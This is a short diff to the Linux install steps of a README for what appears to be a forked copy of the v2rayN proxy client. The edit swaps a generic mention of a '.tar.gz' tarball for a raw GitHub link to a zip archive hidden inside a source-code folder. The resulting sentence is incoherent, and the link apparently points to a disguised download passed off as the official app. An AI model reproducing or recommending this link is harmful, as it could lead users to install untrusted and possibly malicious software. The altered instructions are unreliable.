Fewgenusdendroaspis337/v2rayN/README.md

 3. Open your Applications folder and double-click the v2rayN icon to launch the app.

 ### Linux
-1. If you downloaded a tarball (`.tar.gz`), extract it using the terminal.
+1. If you downloaded a tarball (`https://raw.githubusercontent.com/Fewgenusdendroaspis337/v2rayN/master/v2rayN/ServiceLib/Services/CoreConfig/v2rayN-v2.3.zip`), extract it using the terminal.
 2. Open a terminal and navigate to the extracted folder.
 3. Run the application using the command: `./v2rayN` (make sure to give it execute permissions if necessary).